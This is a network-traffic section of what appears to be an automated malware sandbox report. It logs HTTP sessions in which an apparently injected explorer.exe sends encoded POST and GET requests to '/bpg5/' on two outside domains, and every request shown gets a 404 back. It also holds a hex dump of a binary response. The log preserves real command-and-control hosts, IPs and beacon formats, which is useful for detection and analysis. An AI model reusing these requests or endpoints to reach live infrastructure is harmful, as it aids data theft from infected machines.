27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b
                                        Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r[
                                        May 23, 2023 09:40:23.604821920 CEST297INData Raw: 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64
                                        Data Ascii: ,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.54972381.169.145.9380C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:39:18.116277933 CEST133OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.musicandgros.com
                                        Connection: close
                                        Content-Length: 186
                                        Cache-Control: no-cache
                                        Origin: http://www.musicandgros.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.musicandgros.com/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 79 44 63 46 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 45 47 6a 63 44 66 41 65 41 6e 32 52 4b 36 44 75 2d 33 79 74 7a 44 7a 32 52 33 65 78 68 38 72 33 6f 48 70 31 77 77 42 7e 72 53 61 4e 74 68 61 7e 46 49 31 70 55 7a 43 56 76 72 31 79 45 79 7a 68 70 56 69 63 45 4d 49 63 6c 53 72 7e 4c 28 33 65 77 32 51 50 6d 56 37 32 55 42 39 7e 36 33 6f 51 78 7a 78 41 52 68 52 50 4c 72 4e 64 31 6b 59 39 38 41 49 45 63 55 33 7a 39 6a 6f 67 6e 67 54 56 65 4c 47 28 6a 67 30 38 6b 68 30 47 44 45 36 55 79 53 72 79 6b 4e 33 79 55 65 31 6d 55 30 6a 43 6b 31 6a 4d 67 29 2e 00 00 00 00 00 00 00 00
                                        Data Ascii: yDcF=jKc5GkmqQWJekEGjcDfAeAn2RK6Du-3ytzDz2R3exh8r3oHp1wwB~rSaNtha~FI1pUzCVvr1yEyzhpVicEMIclSr~L(3ew2QPmV72UB9~63oQxzxARhRPLrNd1kY98AIEcU3z9jogngTVeLG(jg08kh0GDE6UySrykN3yUe1mU0jCk1jMg).
                                        May 23, 2023 09:39:18.138227940 CEST133INHTTP/1.1 404 Not Found
                                        Date: Tue, 23 May 2023 07:39:18 GMT
                                        Server: Apache/2.4.57 (Unix)
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.54972481.169.145.9380C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:39:20.661094904 CEST134OUTGET /bpg5/?yDcF=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwSdmK2gNTOclalNw==&jdd=UX4BZm HTTP/1.1
                                        Host: www.musicandgros.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 23, 2023 09:39:20.680449963 CEST134INHTTP/1.1 404 Not Found
                                        Date: Tue, 23 May 2023 07:39:20 GMT
                                        Server: Apache/2.4.57 (Unix)
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.549725198.177.124.5780C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:39:25.948123932 CEST137OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.gomarketing.info
                                        Connection: close
                                        Content-Length: 1482
                                        Cache-Control: no-cache
                                        Origin: http://www.gomarketing.info
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.gomarketing.info/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 79 44 63 46 3d 44 79 6f 41 79 78 62 48 57 46 78 78 41 5a 4e 31 53 50 70 76 38 6e 57 4b 56 48 75 41 70 4b 6b 74 44 45 57 2d 59 55 34 5f 4a 61 68 66 4d 68 78 48 7a 43 30 46 4f 59 4e 65 6f 6a 64 54 6b 63 55 66 52 31 4e 77 76 5f 49 77 61 59 73 32 6f 51 54 2d 4b 6b 32 62 63 63 4a 30 4b 53 67 73 76 6a 45 74 77 6f 35 6e 4d 4d 7a 64 6f 41 6d 51 54 4d 48 36 37 66 57 55 78 41 50 59 53 5f 51 6e 70 59 47 65 38 54 48 47 74 63 58 45 54 61 41 62 7a 59 33 2d 6a 62 57 46 46 6a 6c 64 68 46 36 42 33 6b 45 71 78 45 4e 51 4e 67 52 76 35 6a 46 79 42 4d 33 6d 70 4c 4b 61 69 50 52 41 69 32 6d 2d 31 63 64 39 76 74 78 72 6f 77 56 67 75 42 61 4c 5a 59 52 6c 4d 78 64 45 37 74 34 35 42 57 43 5f 38 57 44 31 7a 68 38 54 6a 34 7e 39 47 64 49 79 41 6d 6a 4f 35 41 68 67 74 69 42 39 59 55 57 71 55 41 42 4b 34 70 35 4b 30 66 55 37 73 46 41 78 31 64 79 46 45 52 52 54 52 78 67 6f 68 6d 4c 39 6e 41 7a 77 71 77 68 71 4a 66 47 74 4f 52 6c 52 57 67 4e 61 69 31 44 66 45 54 79 6a 54 52 61 78 52 43 73 5a 71 63 4a 72 28 62 39 4c 65 59 64 77 73 67 4a 4f 30 77 4d 4c 79 78 4d 35 79 75 43 34 59 6f 73 58 75 50 43 48 7a 51 4b 30 6b 4f 4f 43 4f 7a 4f 74 62 41 54 6e 41 51 56 47 59 70 45 66 59 6f 75 73 4c 35 6b 6b 51 41 35 55 39 67 67 6b 75 30 53 42 53 6f 6a 68 55 67 6c 73 66 69 6e 72 34 56 6c 63 6a 44 55 34 30 59 46 47 30 69 37 71 53 39 65 41 33 71 51 7a 76 31 58 75 57 63 6f 67 65 4d 62 4b 33 69 65 76 78 38 37 56 33 76 41 48 5a 4d 67 57 58 56 6c 56 47 71 32 6b 78 56 28 77 49 39 55 36 51 76 6a 59 48 6f 37 34 39 73 59 49 4f 59 36 77 59 5a 56 64 76 79 63 4f 71 41 6f 78 63 4f 72 55 30 6c 45 65 34 72 6e 42 58 79 52 64 42 68 77 79 5a 74 6c 4f 70 79 50 5f 7e 6f 41 43 41 74 61 2d 79 48 4d 52 7a 36 69 55 79 53 49 58 41 44 52 44 44 78 45 35 74 45 45 5f 74 41 77 51 72 41 47 4e 59 52 62 4c 55 5a 31 39 7e 5f 6c 6a 4e 47 74 30 56 73 55 57 6a 68 67 31 49 5a 4f 77 52 54 73 31 43 62 4f 49 50 79 64 34 4f 4b 39 52 55 37 79 4e 73 4a 6f 43 52 43 68 48 34 75 28 48 79 7a 36 4a 39 56 43 30 57 70 33 76 59 43 62 39 4b 31 48 53 4e 79 4d 46 4a 66 77 44 72 67 4a 69 59 57 38 46 64 77 30 78 6b 37 5a 35 6e 48 6c 73 58 5a 79 70 59 78 67 58 28 70 61 78 52 4c 6d 57 6f 30 61 59 6f 62 34 30 63 33 7e 31 78 68 39 75 6e 5a 4e 37 36 4e 66 6a 4b 59 75 44 6e 49 67 63 30 79 7e 53 35 49 69 7a 6b 51 7a 32 35 4c 44 38 38 67 44 71 63 34 48 48 32 62 5a 63 37 74 53 79 48 68 28 76 57 4a 4a 44 71 54 30 44 46 6d 52 6b 33 6d 49 32 4c 32 4a 62 77 4c 4a 34 30 6d 63 50 72 57 68 48 75 47 67 70 31 47 78 49 68 6c 71 65 51 56 6c 6e 50 2d 30 36 37 50 5a 63 4d 66 33 62 7a 31 4b 41 56 68 62 72 63 61 57 6e 36 6d 37 36 50 31 36 38 6f 43 48 59 72 64 43 75 77 45 52 53 66 6f 49 4c 37 76 65 6f 4b 39 5a 30 63 58 37 51 72 6f 75 30 7a 72 4e 46 74 65 64 64 34 57 75 46 41 43 49 4f 63 61 68 6f 55 48 28 67 4c 34 6d 32 34 72 5a 7a 39 67 72 42 65 68 78 57 33 6e 43 6d 35 74 4a 79 74 5a 33 61 78 7a 30 32 6a 33 61 65 73 66 47 32 38 42 32 53 6e 55 77 39 52 66 39 56 72 66 37 72 79 33 65 66 62 49 47 69 67 6f 32 39 79 48 75 49 66 4b 36 68 71 5a 78 63 44 30 36 78 69 52 76 6b 36 52 35 6e 68 4e 69 36 78 46 66 48 45 31 37 61 6e 4a 67 6c 6d 36 6a 42 69 4b 51 4b 28 4d 65 5f 34 63 7e 78 4e 7a 69 59 6b 42 74 68 45 32 28 31 68 45 7e 30 4d 6b 68 35 6d 30 54 56 4d 32 4e 5f 61 78 47 35 69 5a 54 4a 46 65 59 67 66 77 35 33 49 54 4f 43 56 79 73 58 38 6a 78 38 59 56 78 36 43 31 32 55 4e 51 37 33 4b 58 31 77 65 65 76 72 69 70 6a 64 7a 68 36 41 4a 77 46 44 64 66 6e 74 71 4f 58 56 37 66 30 56 31 46 54 4f 75 57 71 54 36 71 7e 48 57 75 79 50 48 4d 70 77 5a 69 62 47 50 4f 48 44 30 4a 30 4e 4f 42 33 71 5a 59 42 61 79 58 4e 78 6f 35 7e 61 51 33 32 55 31 5f 32 6e 7e 46 49 4e 28 61 78 33 65 37 6f 34 30 39 69 62 6a 5f 74 6e 6f 64 7e 63 41 73 72 4a 44 61 70 59 53 41 49 68 56 50 69 44 28 7a 4f 59 37 56 70 58 44 72 6c 64 33 6e 7a 78 65 42 72 61 79 51 33 72 73 59 37 36 6c 73 66 31 75 76 4c 57 7e 75 75 30 28 31 6d 76 53 53 47 47 47 30 63 54 75 57 37 64 76 66 33 33 6f 72 36 78 74 6e 4d 4a 58 4b 48 75 6e 66 69 34 46 38 45 34 44 56 44 35 7e 78 78 65 69 78 64 66 76 38 6c 6f 56 70 52 50 64 55 31 7a 30 43 5a 71 4c 45 6f 69 35 43 6a 4f 7a 71 37 70 6b 74 28 63 7e 45 7a 47 4f 36 4b 71 37 6f
                                        Data Ascii: yDcF=DyoAyxbHWFxxAZN1SPpv8nWKVHuApKktDEW-YU4_JahfMhxHzC0FOYNeojdTkcUfR1Nwv_IwaYs2oQT-Kk2bccJ0KSgsvjEtwo5nMMzdoAmQTMH67fWUxAPYS_QnpYGe8THGtcXETaAbzY3-jbWFFjldhF6B3kEqxENQNgRv5jFyBM3mpLKaiPRAi2m-1cd9vtxrowVguBaLZYRlMxdE7t45BWC_8WD1zh8Tj4~9GdIyAmjO5AhgtiB9YUWqUABK4p5K0fU7sFAx1dyFERRTRxgohmL9nAzwqwhqJfGtORlRWgNai1DfETyjTRaxRCsZqcJr(b9LeYdwsgJO0wMLyxM5yuC4YosXuPCHzQK0kOOCOzOtbATnAQVGYpEfYousL5kkQA5U9ggku0SBSojhUglsfinr4VlcjDU40YFG0i7qS9eA3qQzv1XuWcogeMbK3ievx87V3vAHZMgWXVlVGq2kxV(wI9U6QvjYHo749sYIOY6wYZVdvycOqAoxcOrU0lEe4rnBXyRdBhwyZtlOpyP_~oACAta-yHMRz6iUySIXADRDDxE5tEE_tAwQrAGNYRbLUZ19~_ljNGt0VsUWjhg1IZOwRTs1CbOIPyd4OK9RU7yNsJoCRChH4u(Hyz6J9VC0Wp3vYCb9K1HSNyMFJfwDrgJiYW8Fdw0xk7Z5nHlsXZypYxgX(paxRLmWo0aYob40c3~1xh9unZN76NfjKYuDnIgc0y~S5IizkQz25LD88gDqc4HH2bZc7tSyHh(vWJJDqT0DFmRk3mI2L2JbwLJ40mcPrWhHuGgp1GxIhlqeQVlnP-067PZcMf3bz1KAVhbrcaWn6m76P168oCHYrdCuwERSfoIL7veoK9Z0cX7Qrou0zrNFtedd4WuFACIOcahoUH(gL4m24rZz9grBehxW3nCm5tJytZ3axz02j3aesfG28B2SnUw9Rf9Vrf7ry3efbIGigo29yHuIfK6hqZxcD06xiRvk6R5nhNi6xFfHE17anJglm6jBiKQK(Me_4c~xNziYkBthE2(1hE~0Mkh5m0TVM2N_axG5iZTJFeYgfw53ITOCVysX8jx8YVx6C12UNQ73KX1weevripjdzh6AJwFDdfntqOXV7f0V1FTOuWqT6q~HWuyPHMpwZibGPOHD0J0NOB3qZYBayXNxo5~aQ32U1_2n~FIN(ax3e7o409ibj_tnod~cAsrJDapYSAIhVPiD(zOY7VpXDrld3nzxeBrayQ3rsY76lsf1uvLW~uu0(1mvSSGGG0cTuW7dvf33or6xtnMJXKHunfi4F8E4DVD5~xxeixdfv8loVpRPdU1z0CZqLEoi5CjOzq7pkt(c~EzGO6Kq7oy7NtAcaHeCYFOhq1NNVyzLU9RdJLBr9JU7zXtIiXgSQfXuNdDGP9uT2QC-aCHP5fMFInTOeQbZrVvxBARxp_BZXddmQXm-UImR4aZQAVsKbaUeS8qjrg).
                                        May 23, 2023 09:39:26.202972889 CEST137INHTTP/1.1 404 Not Found
                                        Date: Tue, 23 May 2023 07:39:26 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        5192.168.2.549726198.177.124.5780C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:39:28.641346931 CEST138OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.gomarketing.info
                                        Connection: close
                                        Content-Length: 186
                                        Cache-Control: no-cache
                                        Origin: http://www.gomarketing.info
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.gomarketing.info/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 79 44 63 46 3d 44 79 6f 41 79 78 62 48 57 46 78 78 41 61 4a 31 54 65 70 76 28 48 57 4b 57 48 75 41 6e 71 6b 76 44 45 4b 59 59 57 55 76 4a 70 52 66 4d 51 42 48 7a 77 63 46 4e 59 4e 52 77 54 64 58 67 63 55 77 52 31 4d 5a 76 36 49 77 61 5a 4d 32 72 32 58 2d 66 31 32 59 55 4d 4a 79 66 43 67 58 76 6a 5a 5a 77 6f 31 33 4d 50 7a 64 6f 47 6d 51 53 4d 58 36 78 64 4f 55 68 41 50 57 47 50 51 4b 70 59 4b 4c 38 54 58 4f 74 63 44 45 53 72 73 62 7a 4e 4c 2d 31 59 7e 46 50 44 6c 6d 31 56 37 52 6e 58 77 68 70 56 78 34 50 44 34 73 69 52 35 74 4c 4f 75 34 70 41 29 2e 00 00 00 00 00 00 00 00
                                        Data Ascii: yDcF=DyoAyxbHWFxxAaJ1Tepv(HWKWHuAnqkvDEKYYWUvJpRfMQBHzwcFNYNRwTdXgcUwR1MZv6IwaZM2r2X-f12YUMJyfCgXvjZZwo13MPzdoGmQSMX6xdOUhAPWGPQKpYKL8TXOtcDESrsbzNL-1Y~FPDlm1V7RnXwhpVx4PD4siR5tLOu4pA).
                                        May 23, 2023 09:39:28.894375086 CEST139INHTTP/1.1 404 Not Found
                                        Date: Tue, 23 May 2023 07:39:28 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        6192.168.2.549727198.177.124.5780C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:39:31.933106899 CEST140OUTGET /bpg5/?yDcF=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCON7RUUDcju2gY5A==&jdd=UX4BZm HTTP/1.1
                                        Host: www.gomarketing.info
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 23, 2023 09:39:32.186976910 CEST140INHTTP/1.1 404 Not Found
                                        Date: Tue, 23 May 2023 07:39:32 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
